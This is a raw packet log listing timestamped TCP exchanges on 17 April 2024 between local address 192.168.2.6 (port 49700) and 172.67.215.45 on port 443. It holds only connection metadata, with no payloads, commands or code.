Apr 17, 2024 08:39:25.558002949 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.558881044 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.558902979 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.558929920 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.558938026 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.558965921 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.559007883 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.560656071 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.560676098 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.560734034 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.560750961 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.560787916 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.561743975 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.561767101 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.561800957 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.561813116 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.561836004 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.561857939 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.562666893 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.562691927 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.562726021 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.562732935 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.562762022 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.562777042 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.563646078 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.563671112 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.563702106 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.563709974 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.563734055 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.563752890 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.565414906 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.565437078 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.565483093 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.565495968 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.565515995 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.565546036 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.566384077 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.566404104 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.566462040 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.566467047 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.566493034 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.566517115 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.567363024 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.567389011 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.567425966 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.567431927 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.567461014 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.567492008 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.568329096 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.568350077 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.568386078 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.568392038 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.568419933 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.568439960 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.569288015 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.569308043 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.569359064 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.569365025 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.569406033 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.570760012 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.570780993 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.570816040 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.570822954 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.570849895 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.570873022 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.571691990 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.571717978 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.571753979 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.571762085 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.571790934 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.571810961 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.572613955 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.572643042 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.572675943 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.572681904 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.572705030 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.572726011 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.573533058 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.573554039 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.573587894 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.573595047 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.573628902 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.573652029 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.574553013 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.574575901 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.574634075 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.574640036 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.574681997 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.576199055 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.576220989 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.576263905 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.576271057 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.576292992 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.576312065 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.576703072 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.576725006 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.576786995 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.576792955 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.576832056 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.577575922 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.577598095 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.577639103 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.577647924 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.577677011 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.577706099 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.578562021 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.578583002 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.578636885 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.578644991 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.578699112 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.579519033 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.579543114 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.579576969 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.579583883 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.579621077 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.581183910 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.581207037 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.581248045 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.581255913 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.581284046 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.582034111 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.582056999 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.582096100 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.582103968 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.582129002 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.582155943 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.582998037 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.583019018 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.583081007 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.583091021 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.583112955 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.583129883 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.583425999 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.583446980 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.583478928 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.583487034 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.583512068 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.583595991 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.584310055 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.584331989 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.584359884 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.584414005 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.584419012 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.584527969 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.585314035 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.585333109 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.585367918 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.585375071 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.585402012 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.585433006 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.586189032 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.586210966 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.586246967 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.586255074 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.586280107 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.586304903 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.587152958 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.587172985 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.587208986 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.587215900 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.587251902 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.587275982 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.588112116 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.588131905 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.588186979 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.588195086 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.588233948 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.588975906 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.588994980 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.589056969 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.589065075 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.589154005 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.589850903 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.589870930 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.589905024 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.589910984 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.589936018 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.589951992 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.590775967 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.590799093 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.590831995 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.590838909 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.590862989 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.590882063 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.591983080 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.592004061 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.592037916 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.592045069 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.592072010 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.592089891 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.592662096 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.592681885 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.592725039 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.592732906 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.592756033 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.592772961 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.593524933 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.593545914 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.593581915 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.593589067 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.593626976 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.593645096 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.594490051 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.594515085 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.594547033 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.594556093 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.594578981 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.594607115 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.595308065 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.595329046 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.595372915 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.595380068 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.595408916 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.595428944 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.596246958 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.596266985 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.596319914 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.596328020 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.596370935 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.597131968 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.597152948 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.597193956 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.597199917 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.597225904 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.597255945 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.598193884 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.598220110 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.598258972 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.598265886 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.598288059 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.598308086 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.599122047 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.599145889 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.599193096 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.599200964 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.599246025 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.599895954 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.599917889 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.599955082 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.599961996 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.599992037 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.600012064 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.600605011 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.600625992 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.600683928 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.600691080 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.600761890 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.601680994 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.601708889 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.601748943 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.601757050 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.601794958 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.601813078 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.602565050 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.602586031 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.602641106 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.602655888 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.602722883 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.603694916 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.603714943 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.603761911 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.603771925 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.603796959 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.603817940 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.604451895 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.604475021 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.604513884 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.604525089 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.604547024 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.604566097 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.605309010 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.605333090 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.605386972 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.605396032 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.605454922 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.606059074 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.606085062 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.606113911 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.606120110 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.606151104 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.606180906 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.606933117 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.606955051 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.606996059 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.607002020 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.607032061 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.607050896 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.607852936 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.607872963 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.607912064 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.607919931 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.607945919 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.607964039 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.608901024 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.608922958 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.608961105 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.608968019 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.608994007 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.609009981 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.609837055 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.609859943 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.609925032 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.609935045 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.610007048 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.610435963 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.610456944 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.610507011 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.610516071 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.610548973 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.610989094 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.611010075 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.611063957 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.611073971 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.611109018 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.611721992 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.611743927 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.611797094 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.611807108 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.611841917 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.611979008 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.611996889 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.612032890 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.612040043 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.612062931 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.612082005 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.612890959 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.612910986 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.612958908 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.612968922 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.613002062 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.613595009 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.613619089 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.613678932 CEST	49700	443	192.168.2.6	172.67.215.45
